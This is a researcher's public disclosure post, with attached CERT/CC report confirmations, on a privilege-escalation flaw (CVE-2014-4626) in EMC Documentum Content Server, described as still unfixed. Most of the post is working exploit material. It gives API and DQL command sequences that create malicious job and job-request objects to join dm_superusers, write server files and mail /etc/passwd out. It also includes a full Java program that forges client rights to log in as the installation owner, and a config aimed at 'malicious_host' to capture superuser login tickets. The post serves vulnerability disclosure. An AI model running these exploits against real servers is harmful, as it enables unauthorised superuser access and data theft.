[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Extra information for CVE-2014-4626 - EMC Documentum Content Server: authenticated user is able to elevate privileges, hijack Content Server filesystem, execute arbitrary commands by creating malicious dm_job objects



Product: EMC Documentum Content Server
Vendor: EMC
Version: ANY
CVE: N/A
Risk: High
Status: public/not fixed


On April 2014 I discovered vulnerability in EMC Documentum Content Server
which allow authenticated user to elevate privileges, hijack Content Server
filesystem or execute arbitrary commands by creating malicious dm_job
objects (for detailed description see VRF#HUFU6FNP.txt and VRF#HUFV0UZN.txt).

On October 2014 vendor announced ESA-2014-105 which was claiming that
vulnerability has been remediated.

On November 2014 fix was contested (there was significant delay after
ESA-2014-105 because vendor constantly fails to provide status of reported
vulnerabilities) by providing PoC similar to described in VRF#HUGC34JH.txt,
description provided to CERT/CC (another CNA was chosen because vendor
fails to communicate) was:
=================================8<================================
The problem is that non-privileged user is able to create dm_job objects and
execute corresponding docbase methods (some examples of "malicious" methods
are given in VRF#HUFU6FNP, also see VRF#HUFV0UZN), the word "create" here
does mean some sequence of commands which result to existence of dm_job
object. PoC in VRF#HUFU6FNP describes attack on scheduler - scheduler does
not schedule jobs unless they are owned by superuser, so, the command
sequence in that case was: "create dm_job and update dm_job", EMC thinks
that they have fixed vulnerability, but they just fixed the sequence given
in PoC, another sequence is "create dm_sysobject, update dm_sysobject &
change dm_sysobject" - see VRF#HUGC34JH, it's already known attack.
Also, I could provide third PoC related to this report, but I do not  think
that would be useful for EMC.
=================================>8================================


Current status of CVE-2014-4626 is obscure, last public status could be
found in CERT/CC spreadsheet (http://www.kb.cert.org/vuls/id/315340):
=================================8<================================
The new exploit is being tracked under PSRC-2494.
This is targeted for Q1 2015 (March patch).
=================================>8================================

Though latest builds of EMC Documentum Content Server successfully pass PoCs
described previously:
=================================8<================================
API> create,c,dm_job
...
08024be980006902
API> set,c,l,owner_name
SET> dmadmin
...
OK
API> set,c,l,world_permit
SET> 7
...
OK
API> save,c,l
...
[DM_SYSOBJECT_E_CANT_CHANGE_OWNER_NAME]error:
  "Must have system admin privileges or superuser privileges
   to change the owner_name to 'dmadmin'."



API> create,c,dm_sysobject
...
08024be980006904
API> set,c,l,owner_name
SET> dmadmin
...
OK
API> set,c,l,world_permit
SET> 7
...
OK
API> save,c,l
...
OK
API> ?,c,change dm_sysobject object to dm_job
                      where r_object_id='08024be980006904'
[DM_QUERY_F_CHANGE_SAVE]fatal:  "CHANGE:  An unexpected save
      error has occurred for object 08024be980006904."

[DM_USER_E_NEED_SU_OR_SYS_FOR_OBJECT_CHANGE]error:
     "The current user (test) needs to have superuser or sysadmin
      privilege to create or save or destroy objects of type (dm_job)."
=================================>8================================


the vulnerability remains unfixed, below is a another PoC (job engine in
Documentum consists of two parts: scheduler and executor, previous attacks
were designed to exploit vulnerability in scheduler, this one demonstrates
how to exploit vulnerability in job executor):
=================================8<================================
API> create,c,dm_job
...
08024be98000690e
API> set,c,l,object_name
SET> malicious job
...
OK
API> set,c,l,inactivate_after_failure
SET> 0
...
OK
API> set,c,l,max_iterations
SET> 0
...
OK
API> set,c,l,method_name
SET> dm_file_writer
...
OK
API> set,c,l,pass_standard_arguments
SET> 0
...
OK
API> set,c,l,run_interval
SET> 1
...
OK
API> set,c,l,run_mode
SET> 1
...
OK
API> set,c,l,run_now
SET> 1
...
OK
API> set,c,l,is_inactive
SET> 0
...
OK
API> set,c,l,world_permit
SET> 7
...
OK
API> append,c,l,method_arguments
SET> /tmp/test.txt
...
OK
API> append,c,l,method_arguments
SET> agentexec_has_vulnerability
...
OK
API> append,c,l,method_arguments
SET> CREATE
...
OK
API> save,c,l
...
OK
API> apply,c,,DO_METHOD,METHOD,S,agent_exec_method,
        ARGUMENTS,S,'
            -docbase_name DCTM_DEV.DCTM_DEV
            -docbase_owner dmadmin
            -job_id 08024be98000690e
            -log_directory /u01/documentum/cs/dba/log
            -docbase_id 150505
            -trace_level 10
       '
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

 result                          : 0
 process_id                      : 91436
 launch_failed                   : F
 method_return_val               : 0
 os_system_error                 : No Error
 timed_out                       : F
 time_out_length                 : 60
 app_server_host_name            :
 app_server_port                 : 0
 app_server_uri                  :
 error_message                   :

SYSTEM ATTRIBUTES


APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES


API> Bye
~]$ cat /tmp/test.txt
agentexec_has_vulnerability
=================================>8================================

__
Regards,
Andrey B. Panfilov

 Vulnerability Report Confirmation - [VRF#HUFU6FNP]

Your vulnerability report has been successfully received. You may save
or print this page for your own records. The Report Tracking ID assigned
to this report is VRF#HUFU6FNP. Details of your report are listed below.

If you have any questions or require additional information, please call
the CERT Hotline at +1 412-268-7090 or send email to cert@xxxxxxxx
<mailto:cert@xxxxxxxx?subject=VRF%20question%20VRF#HUFU6FNP>. Please
reference this Report Tracking ID: VRF#HUFU6FNP.

Do not use the back button to submit another report. Click here
<https://forms.cert.org/VulReport/index.jsp> instead.


------------------------------------------------------------------------


   Vulnerability Report


Name	Andrey B. Panfilov
Organization	independent
Email Address	andrew@xxxxxxxxxxxx
Telephone Number
Vulnerability Description	EMC Documentum Content Server: any user is
able to elevate privileges, hijack Content Server filesystem, execute
any commands by creating malicious dm_job objects

Documentum Content Server have some docbase methods that are not
supposed to be used by regular users (such methods have special
permissions, that prevent method invocation by regular user), examples
of such methods:

1. mail method - emails text file to user

API> retrieve,c,dm_method where object_name='mail'
...
1001d92080000174
API> dump,c,l
...
USER ATTRIBUTES

object_name : mail
owner_permit : 7
group_name : docu
group_permit : 5
world_permit : 3
method_verb : ./dm_mailwrapper.sh

#!/bin/sh
# Mail wrapper: customize if you like
# Server will pass in subject, address and content_file
# Return of 0 means send succeeded, non-zero status results in the
# server generating an error message iff the method was launched
# synchronously.

delete_contents=0
if [ x"$1" = x"-delete_contents" ] ; then
delete_contents=1
shift
fi

subject=$1
address=$2
content_file=$3

/bin/mail -s "$subject" "$address" < $content_file
status=$?

if [ $delete_contents = 1 ] ; then
# remove the temporary content file once it is sent
\rm $content_file
fi

exit $status

Connected to Documentum Server running Release 6.7.1230.0293 Linux.Oracle
1> execute do_method with method='mail',
2> arguments='test andrew@xxxxxxxxxxxx /etc/passwd'
3> go
[DM_METHOD_E_ASSUME_USER_UV]error: "Your method named (mail) failed to
execute
because the assume user process could not validation your user credentials.
Assume User Process returned (245=DM_CHKPASS_BAD_LOGIN)."

2. dm_file_writer - writes data to text files residing on Content Server
filesystem

API> retrieve,c,dm_method where object_name='dm_file_writer'
...
1001d920800003a1
API> dump,c,l
...
USER ATTRIBUTES

object_name : dm_file_writer
owner_name : dmadmin
owner_permit : 7
group_name : docu
group_permit : 1
world_permit : 1
method_verb : dmbasic -eEntryPoint -f../install/admin/dm_file_writer.ebs


Sub EntryPoint(FilePath As String, DmData As String, WriteMode As String)
On Error Goto ErrorCatch

Select Case WriteMode
Case "DELETE"
Call chgEntry(FilePath, DmData, WriteMode)
Case "CREATE"
Open FilePath For Append As #2
Print #2, DmData
Close #2
Case "UPDATE"
Call chgEntry(FilePath, DmData, WriteMode)
Case "APPEND"
Call chgEntry(FilePath, DmData, WriteMode)
End Select
DmExit 0

ErrorCatch:
Print Error$()
DmExit 1
End Sub


though both methods could not be invoked by non-privileged user,
attacker is able to create malicious dm_job object with required
parameters, and after that Content Server will execute docbase method:

Connected to Documentum Server running Release 6.7.1230.0293 Linux.Oracle
1> create dm_job object
2> set object_name = 'malicious job'
3> set inactivate_after_failure = FALSE
4> set max_iterations = 0
5> set method_name = 'mail'
6> set pass_standard_arguments = FALSE
7> set run_interval = 1
8> set run_mode = 1
9> set run_now = TRUE
10> set start_date = DATE('11/24/2013','mm/dd/yyyy')
11> set expiration_date = DATE('12/11/2016','mm/dd/yyyy')
12> set a_next_invocation = DATE('11/24/2013','mm/dd/yyyy')
13> set is_inactive = FALSE
14> set world_permit=7
15> append method_arguments = 'test'
16> append method_arguments = 'andrew@xxxxxxxxxxxx'
17> append method_arguments = '/etc/passwd'
18> go
object_created
----------------
0801d920805675b0
(1 row affected)

Though Content Server checks dm_job's owner privileges before executing
job it's possible to change owner of created dm_job object either
through API or Webtop:

Connected to Documentum Server running Release 6.7.1230.0293 Linux.Oracle
Session id is s0
API> set,c,0801d920805675b0,owner_name
SET> dmadmin
...
OK
API> save,c,0801d920805675b0
...
OK
API>


~]$ idql repo -Uuser -Ppassword >/dev/null <<_EOF_
create dm_job object
set object_name = 'malicious file writer'
set inactivate_after_failure = FALSE
set max_iterations = 0
set method_name = 'dm_file_writer'
set pass_standard_arguments = FALSE
set run_interval = 1
set run_mode = 1
set run_now = TRUE
set start_date = DATE('11/24/2013','mm/dd/yyyy')
set expiration_date = DATE('12/11/2016','mm/dd/yyyy')
set a_next_invocation = DATE('11/24/2013','mm/dd/yyyy')
set is_inactive = FALSE
set world_permit=7
append method_arguments = '/tmp/test.txt'
append method_arguments = 'agentexec_has_vulnerability'
append method_arguments = 'CREATE'
go
_EOF_
~]$ iapi repo -Uuser -Ppassword >/dev/null <<_EOF_
retrieve,c,dm_job where object_name='malicious file writer'
set,c,l,owner_name
dmadmin
save,c,l
_EOF_
~]$ sleep 60
~]$ cat /tmp/test.txt
agentexec_has_vulnerability
~]$
Can we provide your name to the vendor?	Yes
Do you want to be publicly acknowledged?	Yes
Vendor Contact Status	will not contact
Vendor Name	EMC
Vendor Contact Name
Vendor Contact Email
Vendor Contact Telephone Number
Vendor Tracking ID
Additional Vendor Information
Affected System Configurations	All versions of EMC Documentum Content Server
How was this vulnerability found?
Is the vulnerability being exploited?	Yes
Is there a public exploit?	Yes
Vulnerability Impact
Comments
Attached File
Date	2014-04-25T14:52:21
Report Tracking ID	VRF#HUFU6FNP
CERT Tracking IDs	VU#315340


------------------------------------------------------------------------
Carnegie Mellon University <http://www.cmu.edu/>

©2014 Carnegie Mellon University <http://www.cmu.edu/>


 Vulnerability Report Confirmation - [VRF#HUFV0UZN]

Your vulnerability report has been successfully received. You may save
or print this page for your own records. The Report Tracking ID assigned
to this report is VRF#HUFV0UZN. Details of your report are listed below.

If you have any questions or require additional information, please call
the CERT Hotline at +1 412-268-7090 or send email to cert@xxxxxxxx
<mailto:cert@xxxxxxxx?subject=VRF%20question%20VRF#HUFV0UZN>. Please
reference this Report Tracking ID: VRF#HUFV0UZN.

Do not use the back button to submit another report. Click here
<https://forms.cert.org/VulReport/index.jsp> instead.


------------------------------------------------------------------------


   Vulnerability Report


Name	Andrey B. Panfilov
Organization	independent
Email Address	andrew@xxxxxxxxxxxx
Telephone Number
Vulnerability Description	EMC Documentum Content Server: any user is
able to elevate privileges by creating malicious dm_job_request objects

Vendor was notified about vulnerability on November 2013,
though vendor claims, that vulnerability has been fixed,
it wasn't announced and the fix is incomplete.

Documentum Content Server has two service tasks intended for renaming
users and groups: dm_UserRename and dm_GroupRename. Both are triggered
when administrator renames user or group in Documentum Administrator or
when dm_LDAPSynchronization job completes its execution. Those jobs
polls uncompleted dm_job_request objects and performs corresponding
changes, the problem is any user is able to create malicious
dm_job_request object and either rename his group to system group (e.g.
dm_superusers) or get unauthorized access to objects.

Example of exploitation:

-- creating test group
API> create,c,dm_group
...
1201d9208000dd00
API> set,c,l,group_name
SET> testjobrequest
...
OK
API> save,c,l
...
OK
-- creating test user
API> create,c,dm_user
...
1101d9208007890i
API> set,c,l,user_name
SET> testjobrequestusr
...
OK
API> set,c,l,user_login_name
SET> testjobrequestusr
...
OK
API> set,c,l,user_source
SET> inline password
...
OK
API> set,c,l,user_password
SET> test
...
OK
API> save,c,l
...
OK
API> ?,c,alter group testjobrequest add testjobrequestusr

-- creating test user session
API> connect,repo,testjobrequestusr,test
...
s1
-- creating request to rename testjobrequest group to dm_superusers
API> ?,s1,CREATE dm_job_request OBJECT set object_name='GroupRename',
set job_name='dm_GroupRename',
set method_name='dm_GroupRename',
set arguments_keys[0]='OldGroupName',
set arguments_values[0]='testjobrequest',
set arguments_keys[1]='NewGroupName',
set arguments_values[1]='dm_superusers',
set arguments_keys[2]='report_only',
set arguments_values[2]='F',
set arguments_keys[3]='unlock_locked_obj',
set arguments_values[3]='T'
object_created
----------------
0801d920805759f7
(1 row affected)

-- wait some time while dm_GroupRename job completes

-- now testjobrequestusr user is a member of dm_superusers group
API> ?,s1,select group_name from dm_group where any
i_all_users_names='testjobrequestusr'
group_name
--------------------------------
dm_superusers
(1 row affected)

Currently EMC is trying to implement following approach to fix this
issue - they denying to create dm_job_request objects with specific
values of job_name:

[DM_SESSION_I_SESSION_START]info: "Session 0101d920800f022e started for
user unprivileged_user."


Connected to Documentum Server running Release 6.7.1260.0322 Linux.Oracle
1> CREATE dm_job_request OBJECT set object_name='GroupRename',
2> set job_name='dm_GroupRename',
3> set method_name='dm_GroupRename',
4> set arguments_keys[0]='OldGroupName',
5> set arguments_values[0]='testjobrequest',
6> set arguments_keys[1]='NewGroupName',
7> set arguments_values[1]='dm_superusers',
8> set arguments_keys[2]='report_only',
9> set arguments_values[2]='F',
10> set arguments_keys[3]='unlock_locked_obj',
11> set arguments_values[3]='T'
12> go
[DM_QUERY_F_UP_SAVE]fatal: "UPDATE: An error has occurred during a save
operation."

[DM_USER_E_NEED_SU_OR_SYS_PRIV]error: "The current user
(unprivileged_user) needs to have superuser or sysadmin privilege."


BUT:

1> CREATE dm_job_request OBJECT set object_name='GroupRename',
2> set job_name='dm_GroupRename1',
2> set method_name='dm_GroupRename',
4> set arguments_keys[0]='OldGroupName',
5> set arguments_values[0]='testjobrequest',
6> set arguments_keys[1]='NewGroupName',
7> set arguments_values[1]='dm_superusers',
8> set arguments_keys[2]='report_only',
9> set arguments_values[2]='F',
10> set arguments_keys[3]='unlock_locked_obj',
11> set arguments_values[3]='T'
12> go
object_created
----------------
0801d92080592bcd
(1 row affected)

So, according to VRF#HUFU6FNP non-privileged user is still able to
exploit this vulnerability by creating own dm_job object and malicious
dm_job_request. Also note that user with sysadmin privilege
(VRF#HUDHKNW4) is able to exploit with vulnerability.
Can we provide your name to the vendor?	Yes
Do you want to be publicly acknowledged?	Yes
Vendor Contact Status	will not contact
Vendor Name	EMC
Vendor Contact Name
Vendor Contact Email
Vendor Contact Telephone Number
Vendor Tracking ID
Additional Vendor Information
Affected System Configurations	All versions of EMC Documentum Content Server
How was this vulnerability found?
Is the vulnerability being exploited?	Yes
Is there a public exploit?	No
Vulnerability Impact
Comments
Attached File
Date	2014-04-25T15:16:00
Report Tracking ID	VRF#HUFV0UZN
CERT Tracking IDs	VU#315340


------------------------------------------------------------------------
Carnegie Mellon University <http://www.cmu.edu/>

©2014 Carnegie Mellon University <http://www.cmu.edu/>


 Vulnerability Report Confirmation - [VRF#HUGC34JH]

Your vulnerability report has been successfully received. You may save
or print this page for your own records. The Report Tracking ID assigned
to this report is VRF#HUGC34JH. Details of your report are listed below.

If you have any questions or require additional information, please call
the CERT Hotline at +1 412-268-7090 or send email to cert@xxxxxxxx
<mailto:cert@xxxxxxxx?subject=VRF%20question%20VRF#HUGC34JH>. Please
reference this Report Tracking ID: VRF#HUGC34JH.

Do not use the back button to submit another report. Click here
<https://forms.cert.org/VulReport/index.jsp> instead.


------------------------------------------------------------------------


   Vulnerability Report


Name	Andrey B. Panfilov
Organization	independent
Email Address	andrew@xxxxxxxxxxxx
Telephone Number
Vulnerability Description	EMC Documentum Content Server: any user is
able to elevate privileges by creating "protected" objects using "change
object" command.

In the most cases non-privileged users are restricted to create objects
of certain types, for example, if user is able to create dm_method
object, he is able to gain superuser privileges through execution of
corresponding docbase method, so Content Server puts additional checks
for userâ??s privileges before creating objects of certain types:

Session id is s0
API> create,c,dm_method
...
1001ffd780095581
API> save,c,l
...
[DM_METHOD_E_NEED_PRIV_FOR_CHANGE]error: "The current user (op1tp1)
needs to
have superuser or sysadmin privilege to save or destroy dm_method object."

API> ?,c,create dm_method object set object_name='test'
[DM_QUERY_F_UP_SAVE]fatal: "UPDATE: An error has occurred during a save
operation."

[DM_METHOD_E_NEED_PRIV_FOR_CHANGE]error: "The current user (op1tp1)
needs to have
superuser or sysadmin privilege to save or destroy test dm_method object."


The problem is user is able to "create" object of required type through
execution of "change object" statement if both old and new types share
the same type tag

1. dm_client_rights example:

package com.documentum.fc.client.security.impl;

import static java.lang.System.out;

import com.documentum.fc.client.DfClient;
import com.documentum.fc.client.DfQuery;
import com.documentum.fc.client.IDfACL;
import com.documentum.fc.client.IDfCollection;
import com.documentum.fc.client.IDfQuery;
import com.documentum.fc.client.IDfSession;
import com.documentum.fc.client.IDfSessionManager;
import com.documentum.fc.client.IDfSysObject;
import com.documentum.fc.client.privilege.internal.IClientRegistration;
import com.documentum.fc.client.privilege.internal.IClientRights;
import com.documentum.fc.client.security.internal.IPublicIdentity;
import com.documentum.fc.common.DfId;
import com.documentum.fc.common.DfList;
import com.documentum.fc.common.DfLoginInfo;
import com.documentum.fc.common.IDfList;
import com.documentum.fc.common.IDfLoginInfo;

public class Test {

public static void main(String argv[]) throws Exception {
String docbase = argv[0];
String username = argv[1];
String password = argv[2];
String domain = null;
if (argv.length == 4) {
domain = argv[3];
}

IDfSessionManager sessionManager = new DfClient().newSessionManager();
IDfLoginInfo loginInfo = new DfLoginInfo(username, password);
if (domain != null) {
loginInfo.setDomain(domain);
}
sessionManager.setIdentity(docbase, loginInfo);
out.println("Connecting to docbase '" + docbase + "' as '" + username
+ "'");
IDfSession session = sessionManager.getSession(docbase);
out.println("Connected");
IPublicIdentity publicIdentity = new PublicIdentity();
out.println("Checking dm_client_registration for dfc: "
+ publicIdentity.getIdentity());
IClientRegistration clientRegistration = IpAndRcHelper.getRegistration(
publicIdentity, session);
if (clientRegistration == null) {
out.println("dm_client_registration for dfc '"
+ publicIdentity.getIdentity()
+ "' does not exist, creating...");
String publicKeyIdentifier = IpAndRcHelper
.createNewCertificateObjectIfNeeded(publicIdentity, session);
clientRegistration = (IClientRegistration) session
.newObject("dm_client_registration");
RegAndItsAcl dbData = new RegAndItsAcl();
dbData.reg = clientRegistration;
dbData.acl = (IDfACL) session.newObject("dm_acl");
dbData.acl = IpAndRcHelper
.fillAndSaveACLForClientRegistration(dbData.acl);
IpAndRcHelper.fillAndSaveClientRegistration(dbData.reg,
publicIdentity, publicKeyIdentifier, dbData.acl);
} else {
out.println("dm_client_registration for dfc: "
+ publicIdentity.getIdentity() + " exists");
}
out.println("Checking dm_client_rights for dfc: "
+ publicIdentity.getIdentity());
IClientRights clientRights = (IClientRights) session
.getObjectByQualification("dm_client_rights where client_id='"
+ publicIdentity.getIdentity() + "'");
if (clientRights != null) {
out.println("dm_client_rights object for dfc: "
+ publicIdentity.getIdentity() + " exists, exiting");
return;
}
out.println("dm_client_rights object for dfc: "
+ publicIdentity.getIdentity() + " does not exist, creating");
IDfSysObject tempObject = (IDfSysObject) session
.newObject("dm_sysobject");
tempObject.save();
IDfQuery query = new DfQuery("CHANGE dm_sysobject OBJECT "
+ "TO dm_client_rights SET object_name='"
+ clientRegistration.getObjectName() + "', "
+ "SET client_id='" + publicIdentity.getIdentity() + "', "
+ "SET public_key_identifier='"
+ clientRegistration.getPublicKeyIdentifier() + "', "
+ "SET host_name='" + clientRegistration.getHostName()
+ "', SET allow_all_roles=TRUE, "
+ "SET allow_all_priv_modules=TRUE, "
+ "SET principal_auth_priv=TRUE, "
+ "SET server_trust_priv=TRUE WHERE r_object_id='"
+ tempObject.getObjectId().getId() + "'");
IDfCollection collection = query.execute(session, IDfQuery.EXEC_QUERY);
boolean created = false;
if (collection != null && collection.next()) {
out.println("Object changed: "
+ collection.getInt("objects_changed"));
if (collection.getInt("objects_changed") > 0) {
created = true;
}
}
if (collection != null) {
collection.close();
}
if (!created) {
out.println("Unable to create dm_client_rights object");
return;
}
String installationOwner = session.getServerConfig().getString(
"r_install_owner");
out.println("Reconnecting as " + installationOwner + " ...");
IDfList arguments = new DfList(new String[] {"CONNECT_POOLING",
"ASSUME_USER", "CHECK_ONLY", "AUTHENTICATE_ONLY", "OS_LOGON_NAME",
"LOGON_NAME", "TRUSTED_LOGIN_ALLOWED", });
IDfList types = new DfList(new String[] {"B", "B", "B", "B", "S", "S",
"B", });
IDfList values = new DfList(new String[] {"F", "T", "F", "F",
installationOwner, installationOwner, "T", });
collection = session.apply(DfId.DF_NULLID_STR, "AUTHENTICATE_USER",
arguments, types, values);
if (collection != null && collection.next()) {
if (collection.getInt("RETURN_VALUE") != 1) {
out.println("Unable to authenticate as " + installationOwner);
return;
}
session.assume(new DfLoginInfo(installationOwner, session
.getLoginTicketForUser(installationOwner)));
out.println("Checking whether we are a superuser...");
IDfSysObject serverConfig = (IDfSysObject) session
.getServerConfig();
out.println("Permissions for dm_server_config: "
+ serverConfig.getPermit());
}
if (collection != null) {
collection.close();
}
}
}

2. dm_job_request example (see also VRF#HUFV0UZN):

1> create dm_job_request OBJECT set object_name='GroupRename',
2> set job_name='dm_GroupRename1',
3> set method_name='dm_GroupRename',
4> set arguments_keys[0]='OldGroupName',
5> set arguments_values[0]='testjobrequest',
6> set arguments_keys[1]='NewGroupName',
7> set arguments_values[1]='dm_superusers',
8> set arguments_keys[2]='report_only',
9> set arguments_values[2]='F',
10> set arguments_keys[3]='unlock_locked_obj',
11> set arguments_values[3]='T'
12> go
object_created
----------------
08022428800058f6
(1 row affected)
1> update dm_job_request objects set job_name='dm_GroupRename'
2> where job_name='dm_GroupRename1'
3> go
[DM_QUERY_F_UP_SAVE]fatal: "UPDATE: An error has occurred during a save
operation."

[DM_USER_E_NEED_SU_OR_SYS_PRIV]error:
"The current user (dm_bof_registry) needs to have superuser or sysadmin
privilege."

1> create dm_sysobject object
2> set object_name='dm_GroupRename2'
3> go
object_created
----------------
08022428800058fd
(1 row affected)

1> change dm_sysobject object to dm_job_request
2> set object_name='GroupRename',
3> set job_name='dm_GroupRename',
4> set method_name='dm_GroupRename',
5> set arguments_keys[0]='OldGroupName',
6> set arguments_values[0]='testjobrequest',
7> set arguments_keys[1]='NewGroupName',
8> set arguments_values[1]='dm_superusers',
9> set arguments_keys[2]='report_only',
10> set arguments_values[2]='F',
11> set arguments_keys[3]='unlock_locked_obj',
12> set arguments_values[3]='T'
13> where object_name='dm_GroupRename2'
14> go
objects_changed
---------------
1
(1 row affected)
[DM_QUERY_I_NUM_UPDATE]info: "1 objects were affected by your CHANGE
statement."

3. dm_jms_config example (dm_jms_config could be used to "sniff"
superuser login tickets):

Pre Documentum Content Server v6.7SP1P26 behavior:

create dm_jms_config object
set object_name='malicious JMS config',
set config_type=2,
append server_config_id=(select r_object_id from dm_server_config)
append servlet_name='do_bpm',
append base_uri='http://malicious_host:port/....',
append supported_protocol='http',
append projection_enable=TRUE,
append projection_proximity_value=1,
append projection_targets='malicious_host',
append projection_ports=0

Documentum Content Server v6.7SP1P26 behavior:

1> create dm_jms_config object
2> set object_name='test jms config'
3> go
[DM_USER_E_NEED_SU_OR_SYS_PRIV]error:
"The current user (dm_bof_registry) needs to have superuser or sysadmin
privilege."

1> create dm_sysobject object
2> set object_name='test jms config'
3> go
object_created
----------------
08022428800056fa
(1 row affected)
1> select r_object_id from dm_server_config
2> go
r_object_id
----------------
3d02242880000102
(1 row affected)

1> select r_object_id from dm_jms_config
2> go
r_object_id
----------------
(0 rows affected)
1> change dm_sysobject object to dm_sysprocess_config
2> where object_name='test jms config'
3> go
objects_changed
---------------
1
(1 row affected)
[DM_QUERY_I_NUM_UPDATE]info: "1 objects were affected by your CHANGE
statement."

1> change dm_sysprocess_config object to dm_jms_config
2> append server_config_id='3d02242880000102'
3> where object_name='test jms config'
4> go
objects_changed
---------------
1
(1 row affected)
[DM_QUERY_I_NUM_UPDATE]info: "1 objects were affected by your CHANGE
statement."

4. dmc_module example (see also VRF#HUDHKNW4):

1> create dmc_module object
2> set object_name='test dmc module'
3> go
[DM_USER_E_NEED_SU_OR_SYS_PRIV]error:
"The current user (dm_bof_registry) needs to have superuser or sysadmin
privilege."

1> create dm_folder object
2> set object_name='test dmc module'
3> go
object_created
----------------
0b0224288000578c
(1 row affected)
1> change dm_folder object to dmc_module
2> where object_name='test dmc module'
3> go
objects_changed
---------------
1
(1 row affected)
[DM_QUERY_I_NUM_UPDATE]info: "1 objects were affected by your CHANGE
statement."
Can we provide your name to the vendor?	Yes
Do you want to be publicly acknowledged?	Yes
Vendor Contact Status	will not contact
Vendor Name	EMC
Vendor Contact Name
Vendor Contact Email
Vendor Contact Telephone Number
Vendor Tracking ID
Additional Vendor Information
Affected System Configurations	All versions of EMC Documentum Content Server
How was this vulnerability found?
Is the vulnerability being exploited?	Yes
Is there a public exploit?	Yes
Vulnerability Impact
Comments
Attached File
Date	2014-04-25T23:13:39
Report Tracking ID	VRF#HUGC34JH
CERT Tracking IDs	VU#315340


------------------------------------------------------------------------
Carnegie Mellon University <http://www.cmu.edu/>

©2014 Carnegie Mellon University <http://www.cmu.edu/>